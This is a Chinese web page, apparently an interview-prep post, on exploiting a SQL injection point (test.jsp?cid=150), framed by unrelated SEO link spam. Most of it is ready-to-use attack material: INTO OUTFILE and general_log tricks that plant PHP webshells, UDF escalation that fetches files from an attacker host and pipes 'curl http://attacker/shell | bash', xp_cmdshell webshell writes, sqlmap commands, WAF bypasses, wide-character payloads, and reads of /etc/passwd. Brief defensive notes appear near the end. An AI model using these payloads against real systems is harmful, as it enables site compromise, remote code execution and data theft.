当前位置: 首页 > news >正文

专业网站优化排名太仓建设工程网站

专业网站优化排名,太仓建设工程网站,抖音网络推广怎么做,自己建网站 怎么做后台网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 SQLi 一、发现test.jsp?cid150 注入点的5种WebShell获取思路 1. 文件写入攻击 2. 日志文件劫持 3.…

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

SQLi

一、发现test.jsp?cid=150 注入点的5种WebShell获取思路

1. 文件写入攻击

2. 日志文件劫持

3. UDF提权执行命令

4. 二次注入组合攻击

5. 存储过程滥用(MSSQL场景)

二、工具直接写入WebShell的条件要求

三、MySQL 5.0+与5.0-版本注入差异对比

1. 元数据获取方式

2. 盲注技术差异

3. 函数支持对比

四、SQLMap实战注入方法

1. GET型注入检测

3. 文件加载式注入

五、SQL注入Bypass技巧大全

1. 特殊符号混淆

2. 编码转换技术

3. 逻辑等价替换

4. 参数污染攻击

5. 数据库特性利用

六、SQL注入成因与防御体系

1. 漏洞成因

2. 防御方案

3. 注入类型扩展

4. 非数据利用方式

七、宽字符注入深度解析

1. 漏洞原理

2. Payload构造

3. 修复方案

八、SQL注入判断方法论

1. 基础检测技巧

2. 高级检测手段

3. 工具自动化检测

九、变形注入突破思路

1. 编码转换技术

2. 语法结构混淆

3. 协议层绕过

SQLi

发现 test.jsp?cid=150 注入点,你有哪几种思路获取 webshell?以下链接存在 SQ,用工具对目标站直接写入一句话,需要哪些条件?Mysql的网站注入,5.0以上和5.0以下有什么区别?sqlmap如何对一个注入点注入,sqlmap如何注入一个post的包?你都了解哪些SQL注入的bypass技巧?介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?宽字符注入的原理?如何利用宽字符注入漏洞,payload如何构造及修复方案?如何判断SQL注入,有哪些方法,说说你最常用的?L注入漏洞,对于这个变形注入,你有什么思路?
mysql注入点

一、发现test.jsp?cid=150 注入点的5种WebShell获取思路

1. 文件写入攻击

前置条件

  • MySQL用户具备FILE权限
  • 已知Web目录绝对路径(如/var/www/html
  • secure_file_priv未限制写入路径

Payload构造

sqlUNION SELECT 1,"<?php @eval($_POST['cmd']);?>",3 INTO OUTFILE '/var/www/shell.php' -- 使用CHAR编码绕过过滤: UNION SELECT 1,CHAR(60,63,112,104,112...),3 INTO OUTFILE '/path/shell.php' 
2. 日志文件劫持

操作流程

sqlSET global general_log = 'ON'; SET global general_log_file = '/var/www/log.php'; SELECT '<?php system($_GET["cmd"]);?>'; -- 触发日志记录后访问/log.php?cmd=id 
3. UDF提权执行命令

技术链

bash# 上传恶意so文件到插件目录(需lib_mysqludf_sys.so ) wget http://attacker/udf.so -P /usr/lib/mysql/plugin/ CREATE FUNCTION sys_exec RETURNS int SONAME 'udf.so'; SELECT sys_exec('curl http://attacker/shell | bash');
4. 二次注入组合攻击

场景示例

  1. 通过注入修改用户信息字段为恶意代码
sqlUPDATE profile SET bio='<?php eval($_POST[x]);?>' WHERE uid=1001 
  1. 触发用户信息导出功能生成bio_1001.php
5. 存储过程滥用(MSSQL场景)
sqlEXEC xp_cmdshell 'echo ^<%@ Page Language="C#" %>^ > C:\web\shell.aspx' 

二、工具直接写入WebShell的条件要求

条件类型具体要素验证方法
数据库权限FILE权限(SELECT file_priv FROM mysql.usersqlmap --sql-shell执行查询
路径可控性secure_file_priv值为空或包含Web目录SHOW VARIABLES LIKE 'secure%';
物理路径泄露通过报错信息/phpinfo探针获取构造错误?id=1 AND 1=2触发报错
字符处理绕过引号闭合与编码转换使用Hex编码0x3c3f706870...
WAF防御规避分块传输+注释符混淆sqlmap --tamper=chunked

三、MySQL 5.0+与5.0-版本注入差异对比

1. 元数据获取方式
  • 5.0+:通过information_schema快速获取表结构
    sqlSELECT table_name FROM information_schema.tables WHERE table_schema=database()
  • 5.0-:需暴力猜解表名(如admin/user/article
2. 盲注技术差异
  • 5.0+:利用BENCHMARK()制造延时
    sqlIF(SUBSTR((SELECT password),1,1)='a',BENCHMARK(5000000,MD5('test')),0)
  • 5.0-:依赖布尔响应差异
3. 函数支持对比
功能5.0+支持5.0-限制
文件读写LOAD_FILE()可用依赖特殊配置
系统命令执行需UDF或存储过程基本不可行
报错信息利用updatexml()触发仅支持简单错误回显

四、SQLMap实战注入方法

1. GET型注入检测
bashsqlmap -u "http://site.com/test.jsp?cid=150" --batch --technique=BEUST -- 参数说明: -- `-batch`:自动选择默认选项 -- `--technique`:指定注入技术(B:布尔盲注/E:报错注入/U:联合查询/S:时间盲注/T:基于时间) #### 2. POST型注入操作 ```bash sqlmap -u "http://site.com/login" --data="user=admin&pass=123" --method=POST -- 高级用法: sqlmap -r request.txt --proxy="http://127.0.0.1:8080" --risk=3 --level=5 
3. 文件加载式注入
bash# 保存请求到request.txt (包含Cookie和POST数据) sqlmap -r request.txt --dbs 

五、SQL注入Bypass技巧大全

1. 特殊符号混淆
sqlSELECT/*![40000 1,*/2,3 FROM users WHERE id=1--%0a -- 使用内联注释绕过关键字过滤 
2. 编码转换技术
  • URL编码UNION%20SELECTUNION SELECT
  • Unicode编码U+0053ELECTSELECT
  • 双重编码%2553ELECTSELECT
3. 逻辑等价替换
sqlWHERE id=1 || 1=1 -- 替代OR 1=1 WHERE id=1 DIV 1 -- 替代AND 1=1 
4. 参数污染攻击
httpGET /test?id=1&id=2 UNION SELECT 1,@@version,3 
5. 数据库特性利用
sql/*!50000SELECT*/ 1 FROM users -- MySQL版本条件执行 

六、SQL注入成因与防御体系

1. 漏洞成因
  • 直接拼接"SELECT * FROM users WHERE id=" + request.getParameter("id")
  • 错误处理不当:显示数据库错误信息(如MySQL错误栈)
2. 防御方案
  • 输入过滤
    python# Python示例:参数化查询 cursor.execute("SELECT * FROM users WHERE id=%s", (user_input,))
  • 最小权限原则
    sqlGRANT SELECT ON db.users TO 'webuser'@'%'; REVOKE FILE,EXECUTE ON *.* FROM'webuser'@'%';
3. 注入类型扩展
类型检测方法利用场景
联合查询注入ORDER BY测试列数快速获取数据
报错注入AND 1=updatexml(1,concat(0x7e,version()),1)信息泄露
时间盲注IF(1=1,SLEEP(5),0)无回显场景
4. 非数据利用方式
  • 文件系统操作
    sqlLOAD_FILE('/etc/passwd') INTO OUTFILE '/tmp/passwd'
  • 系统命令执行(需条件):
    sqlsys_exec('rm -rf /tmp/*')

七、宽字符注入深度解析

1. 漏洞原理

GBK编码中%bf%5c会被解析为汉字"縗",导致单引号逃逸:

  • 原始输入:id=1%bf'
  • 转义后:1縗'%bf%5c%27縗'
2. Payload构造
httphttp://site.com/test.php?id=1%bf%27%20AND%201=1%20--+ -- 解码后等价于:id=1' AND 1=1 -- 
3. 修复方案
  • 统一字符集
    phpmysqli_set_charset($conn, "utf8mb4");
  • 过滤策略
    php$id = preg_replace('/[^\x00-\x7F]/', '', $_GET['id']);

八、SQL注入判断方法论

1. 基础检测技巧
  • 单引号测试
    http://site.com/?id=1' → 观察是否出现数据库错误
  • 布尔逻辑检测
    ?id=1 AND 1=1 vs ?id=1 AND 1=2 → 页面内容差异
2. 高级检测手段
  • 时间盲注探测
    sqlIF(SUBSTR((SELECT password),1,1)='a',SLEEP(5),0)
  • 报错注入利用
    sqlAND GTID_SUBSET(CONCAT(0x7e,(SELECT USER()),0x7e),1)
3. 工具自动化检测
bashsqlmap -u "http://site.com/test.jsp?cid=150" --batch --forms 

九、变形注入突破思路

1. 编码转换技术
  • Hex编码绕过
    sqlSELECT 0x73656C656374 FROM users -- 等价于"SELECT"
  • Base64解码利用
    sqlSELECT FROM_BASE64('c2VsZWN0') AS cmd;
2. 语法结构混淆
sqlSELECT 1 FROM users WHERE id=1||1=1 -- 替代OR 1=1 
3. 协议层绕过
httpPOST /test HTTP/1.1 Transfer-Encoding: chunked 1 id=1 UNION/* 0 SELECT 1,2,3 FROM users 
http://www.dtcms.com/a/595731.html

相关文章:

  • 行政单位网站信息建设政策WordPress 蜘蛛池
  • 萧山区建设工程质量监督站网站WordPress 游戏
  • 谷歌网站开发客户网络公司要求做网站工商网监
  • 外贸设计网站建设律师做网络推广最好的网站有哪些
  • 花生壳内网穿透网站如何做seo优化荥阳市建设局网站
  • 招聘网站开发计划花都网站建设价格
  • 衡水哪家制作网站好阿里巴巴国际站网站建设
  • 做竞彩网站代理犯法么做婚纱网站策划方案
  • html5做的网站信游天下网站建设
  • 好的网站推荐一个查公司的口碑和评价的网站
  • 网站3d展示怎么做的网站模板安全管理系统
  • 平台网站开发公司微网站趋势
  • 学校网站的建设与使用情况上海人才市场网
  • 做电工的有接单的网站吗网站域名使用
  • 龙泉市建设局门户网站响应式网站建设合同
  • 不动产登记网站建设怎样做医疗保健网站
  • 教育网站开发报告wordpress子菜单不显示
  • 做任务给佣金的网站如何设置免费网站
  • 吉林省工伤保险网站广州腾虎网络网站建设
  • 企业网站维护与销售iis装网站
  • 做品牌网站哪个好用怎么申请建立一个公司网站
  • 爱站网功能南通网站制作建设
  • 如何做彗聪网站呢创新的武进网站建设
  • 建网站的公司 快云做网站好的网站建设公司排名
  • 漏惹网站做公司网站建设免费
  • 做引流去那些网站好免费商城网站建站系统
  • 网站地址栏图标怎么做刷seo关键词排名软件
  • 面试网站建设问题北京软件开发学校
  • 自己建私人网站做外贸不好做wordpress 更改媒体库路径
  • 网站会员推广功能门户网站建设的重要作用